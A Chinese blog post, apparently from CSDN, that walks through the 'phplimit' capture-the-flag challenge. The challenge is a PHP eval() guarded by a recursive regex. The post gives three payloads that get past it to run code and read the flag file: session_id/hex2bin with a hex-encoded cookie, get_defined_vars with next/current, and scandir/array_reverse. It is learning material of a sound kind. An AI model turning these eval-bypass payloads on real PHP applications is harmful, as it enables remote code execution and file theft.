Code-Breaking Puzzles easy - phplimit(代码执行限制绕过)

最新推荐文章于 2022-11-18 23:18:03 发布
最新推荐文章于 2022-11-18 23:18:03 发布
阅读量1k 收藏
点赞数
分类专栏: ★ CTF # ——【 Code Audit】 # ——【 Command Execute】 ★ PHP 文章标签: 代码审计 正则 session_id() get_defined_vars() arrary_reverse()&scandir()
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/90047877
版权

题目地址:http://120.78.164.84:49006

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
    show_source(__FILE__);
}

这里的正则匹配涉及到了PHP正则表达式的递归模式:

http://php.net/manual/zh/regexp.reference.recursive.php

代码很短,但是这里会把code最里面括号内的内容替换为空,一起来见识一下别的大佬用到的几种方法。

 

1,session_id

[GET] ?code=eval(hex2bin(session_id(session_start())));

PHPSESSID=7072696e745f722866696c655f6765745f636f6e74656e747328272e2e2f666c61675f7068706279703473732729293b
//print_r(file_get_contents('../flag_phpbyp4ss'));

session_id() 用于获取PHPSESSID的值
session_start() 用于使用当前cookie中的会话
hex2bin则将16进制转换为二进制,根据手册,只是换了一种存储方式,解决编码转换问题,本质没有变换。 

 

 

2,get_defined_vars

?code=eval(next(current(get_defined_vars())));
&b=print_r(scandir('../'));print_r(file_get_contents('../flag_phpbyp4ss'));

current() 返回数组中的当前单元
next() 和 current() 的行为类似,只有一点区别,在返回值之前将内部指针向前移动一位。
这意味着它返回的是下一个数组单元的值并将数组指针向前移动了一位。

 

3,arrary_reverse&scandir

?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));

getcwd — 取得当前工作目录
dirname — 返回路径中的目录部分,给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名
chdir — 改变目录
scandir — 列出指定路径中的文件和目录,返回一个array ,包含有 directory 中的文件和目录
array_reverse — 返回单元顺序相反的数组,接受数组 array 作为输入并返回一个单元为相反顺序的新数组(只有两个文件)

 

同类题目

RCTF 2018 的 r-cursive,但环境不同。

烟敛寒林o
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
代码审计Code-Breaking Puzzles学习记录
酉酉的博客
12-12 894
文章目录前言easy - functionpayloadeasy - pcrewafpayloadeasy - phpmagicpayloadeasy - phplimitpayload 前言 Code-Breaking Puzzles是一场完全开放源代码的Web解密游戏,其包含但不限于PHP、Java、Node.js、Python等语言的代码审计知识。 p师傅的知识星球真是干货多多,刚刚加入就...
code-puzzles:编程挑战与算法
04-07
在"code-puzzles-main"这个压缩包文件中,我们可以期待找到一个主目录,其中包含各个编程挑战的子目录或文件。每个挑战可能包含一个问题描述、预期的输入/输出示例以及可能的解决方案。通过解决这些挑战,学习者可以...
php代码php代码
04-24
光盘使用说明 光盘内容框架 本书附带光盘内容包括本书源程序、部分模块视频教学录像、《编程词典》试用版,完整光盘内容框架如图1.1所示。 图1.1 光盘内容框架图 如何使用本书源程序 1、开发及运行环境 本书源程序都是在Windows Server 2003下开发的,程序测试环境为Windows Server 2003。用户只有在Windows Server 2003下正确配置程序所需的运行环境后,才可以使用本书中的源程序。软件开发平台如下: 操作系统:Windows Server 2003或Linux; Apache服务器:apache_2.2.8-win32-x86-no_ssl.msi; PHP软件:php-5.2.5-Win32.zip; MySQL图形化管理软件:phpMyAdmin-2.11.5.zip; 数 据 库:SQL Server 2000、MySQL(mysql-noinstall-5.1.11-beta-win32.zip); 浏 览 器:IE5.0及以上版本,推荐使用IE6.0; 分 辨 率:最佳效果1024×768像素; 2、源程序使用方法 (1)使用本书中源程序时,请将源程序文件夹下的所有文件拷贝到计算机硬盘上,并去掉所有文件的只读属性。 (2)在系统上安装PHP、MySQL、Apache、phpmyadmin或直接安装AppServ。 (3)数据库文件存储于源程序下的data文件夹中。 《编程词典》介绍及使用 本书另赠送“编程词典体验版”,可以帮助开发人员高效地在技术文档和源代码中搜索所需技术,同时配套提供了主要开发技术的视频教学录像和界面设计方案等,帮助程序开发人员设计程序。是程序开发人员的必备工具软件。 《编程词典》系列软件是由明日科技公司组织数十位资深编程技术人员,为广大程序设计人员开发的易查、易学、易用的高效编程工具软件。词典分为《PHP编程词典》、《Visual Basic编程词典》、《Delphi编程词典》、《Visual C++编程词典》、《ASP编程词典》、《C#编程词典》、《ASP.NET编程词典》、《SQL Server编程词典》和《JAVA编程词典》等九个系列。各词典中都包括以下内容。  详尽、完整的技术开发手册,内容超过8000页的专业技术文档。  我公司多年开发的近30个项目的专业开发文档及全部源程序。  数千个典型模块、实例和技巧的文档及源程序。赠送数年积累的开发锦囊和实用工具。  50个专业技术方案,透彻分析开发精髓。  30个小时的开发录像,12个小时开发技术录像和18个小时的项目开发全程录像。  数位专业美工多年设计的20套界面设计方案,100个开发素材。  详细的图书资源目录查询及我公司出版的专业图书的阅读与查询。  智能、人性化的技术查询定位。  附带SQL词典、工程词典、英语、UML等工具词典。  全面的个人资源管理。 其中,《PHP编程词典》体验版,是随本书图书光盘赠送的一款含有技术中心、查询中心两大版块功能的体验版系列软件,可以快速查询PHP的一些技术。 使用编程词典前应首先将其安装到硬盘上,打开光盘(直接通过光盘打开或者通过全程视频教学程序中的“编程词典软件”按钮调用打开),具体安装步骤如下。 (1)双击“编程词典体验版.exe”文件,进入安装页面,如图1.3所示。 图1.3 安装页面 (2)单击“下一步”按钮,选择“我同意该许可协议的条款”单选按钮,如图1.4所示的页面。 图1.4 许可协议页面 (3)单击“下一步”按钮,进入用户信息页面,输入公司名称,如图1.5所示。 图1.5 用户信息页面 (4)单击“下一步”按钮,进入选择安装路径页面,如图1.6所示。 图1.6 选择安装路径页面 (5)单击“下一步”按钮,进入创建快捷方式页面,如图1.7所示。 图1.7 创建快捷方式页面 (6)单击“下一步”按钮,进入准备安装页面,如图1.8所示。 图1.8 准备安装页面 (7)单击“下一步”按钮,开始安装。安装完成后,弹出如图1.9所示的安装成功页面,单击“完成”按钮,完成安装操作。 图1.9 安装成功页面
2018 Code Breaking(3) & phplimit
蚁景网安学院
03-24 398
原创作者:一叶飘零 前言 本次是phplimit这道题,本篇文章提供了3种解法,即如何利用无参数函数进行RCE/任意文件读取 题目概述 题目源码如下: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_s...
PHP常用代码大全
韩保红的代码库博客——记录我的学习历程
01-25 496
1、连接MYSQL数据库代码 &lt;?php $connec=mysql_connect("localhost","root","root") or die("不能连接数据库服务器: ".mysql_error()); mysql_select_db("liuyanben",$connec) or die ("不能选择数据库: ".mysql_error()); mysq
PHP代码
Slowtao的专栏
12-17 476
name=$name; $this->type=$type; } function vod() { return $this->name.$this->type."看电影 "; } function game() { return $this->vod()."玩游戏 "; } function intelnet() { return $this->game()."上网"; } function __destruct() //析构函数 垃圾回收 { echo " ===$this->name=== ";
行业教育软件-学习软件-Animated Puzzles2 1.0 英文版.zip
08-01
至于压缩包内的文件,"行业教育软件-学习软件-Animated Puzzles2 1.0 英文版"很可能是包含了该软件的安装程序或执行文件,用户下载解压后即可安装使用。可能还包括相关的文档、帮助文件或者更新日志,以便用户了解...
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
08-01
《 Animated Puzzles3 1.0 英文版:一款创新的行业教育与学习工具》 在数字化时代,教育软件已经成为辅助学习、提升教学效果的重要工具。"Animated Puzzles3 1.0 英文版"就是这样一款专为行业教育和学习设计的软件...
Android代码-Puzzles
08-06
This is the README accompanying the source code to Simon Tatham's puzzle collection. The collection's web site is at . If you've obtained the source code by downloading a .tar.gz archive from the ...
PHP代码格式
雜貨鋪
03-06 815
原文地址:http://blog.sina.com.cn/s/blog_538f130c01010r9h.html PHP代码有下列几种格式,在此推荐使用第一种格式。 1、标准格式,以 结束。例如:      echo"welcome!"; ?> 2、短标签,以 结束。例如:     print "Thisis a PHP example."; ?>
编写PHP代码
最新发布
Anpetixa的博客
11-18 3306
php初级学习
PHP代码笔记
天天学安全专属博客
04-02 796
PHP相关知识,网站如何运行
php示例代码
yogoma的专栏
03-31 1406
1、面向过程代码示例 <?php if($animal=="dog"){ if($animal=="dog"){ return "汪"; } if($animal=="cat"){ return "喵"; } if($animal=="cow"){ return "哞"; } return "暂时听不懂该动物的声音,动物学家们正在研究"; } echo getSou
php 常用代码
无产阶级
01-26 766
常用代码之    验证码的实现 先说说原理:首先生成16进制的数(验证码)是几位自己定义,放入session中,用于和表单提交过来的数据作对比。之后开始创建画布,添加背景,画干扰线,最后把生成的验证码添加到画布中。这就是验证码,之后再页面中调用都可以了 /** *2013-8-6 *@author Frank *验证码 */ $code=''; for($i=0;$i// 4
PhP常用代码
wangjian0310的专栏
06-06 859
PHP常用代码 1、连接MYSQL数据库代码 $connec=mysql_connect("localhost","root","root") or die("不能连接数据库服务器: ".mysql_error()); mysql_select_db("liuyanben",$connec) or die ("不能选择数据库: ".mysql_error()); mysql_query
值得收藏的php代码,10个超级有用值得收藏的PHP代码片段
weixin_31863707的博客
03-19 430
尽管PHP经常被人诟病,被人贬低,被人当玩笑开,事实证明,PHP是全世界网站开发中使用率最高的编程语言。PHP最大的缺点是太简单,语法不严谨,框架体系很弱,但这也是它最大的优点,一个有点编程背景的普通人,只需要学习PHP半天时间,就可以上手开始开发web应用了。网上有人总结几种编程语言的特点,我觉得也挺有道理的:代码如下:PHP 就是: Quick and DirtyJava 就是: Beauty...
php简单代码大全,征集常用的PHP简单代码
weixin_39908948的博客
04-04 1032
收集常用的PHP简单代码对于日常工作中整理出来的某些功能做个简单梳理:?1. 短链生成算法function code62($x) {$show = '';while($x > 0) {$s = $x % 62;if ($s > 35) {$s = chr($s+61);} elseif ($s > 9 && $s <=35) {$s = chr($s + 5...
多元视角下的复杂系统建模:挑战与整合策略
在当今世界,复杂系统的建模,如生态和社会经济系统,面临着巨大的挑战。这些系统动态性和相互关联性使得单一模型难以全面准确地反映其行为。传统上,不同领域的建模方法往往各自独立,导致模型间的不兼容性和缺乏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值